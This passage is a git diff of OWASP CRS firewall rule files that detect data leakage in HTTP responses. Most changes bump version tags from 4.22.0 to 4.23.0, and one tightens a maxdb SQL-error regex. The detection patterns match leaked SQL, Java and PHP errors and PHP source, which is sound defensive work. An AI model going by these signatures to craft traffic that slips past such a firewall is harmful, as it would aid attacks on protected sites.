--- a/rules/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -29,7 +29,7 @@ SecRule TX:crs_skip_response_analysis "@eq 1" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION" # Skip all rules if RESPONSE_BODY is compressed. @@ -40,11 +40,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -68,7 +68,7 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116/54/127',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -100,7 +100,7 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -123,13 +123,13 @@ SecRule RESPONSE_BODY "@pmFromFile asp-dotnet-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/118/116/54/127',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -153,22 +153,22 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES',\ tag:'capec/1000/152',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf index 3fc61ad918..c31c907368 100644 --- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-SQL-ERROR-MATCH-PL1" SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ @@ -67,7 +67,7 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -93,7 +93,7 @@ SecRule RESPONSE_BODY "@rx (?i)\bORA-[0-9][0-9][0-9][0-9][0-9]:|java\.sql\.SQLEx tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -114,7 +114,7 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]| tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -135,7 +135,7 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -156,7 +156,7 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -177,7 +177,7 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -198,7 +198,7 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -219,7 +219,7 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -240,7 +240,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -261,12 +261,12 @@ SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" -SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ +SecRule RESPONSE_BODY "@rx (?i)Warning.{1,10}maxdb[\(\)_a-z:]{1,26}:" \ "id:951210,\ phase:4,\ block,\ @@ -282,7 +282,7 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -303,7 +303,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -329,7 +329,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.* tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -355,7 +355,7 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -376,7 +376,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_|Warning.*SQLite3::|SQLite/JDB tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -397,7 +397,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -405,24 +405,24 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 11f0159516..82da2f05ea 100644 --- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -50,30 +50,30 @@ SecRule RESPONSE_BODY "@rx (?i)\b(?:java[\.a-z]+E(?:xception|rror)|(?:org|com)\. tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf index b391173084..053e8879eb 100644 --- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -73,7 +73,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -99,13 +99,13 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule 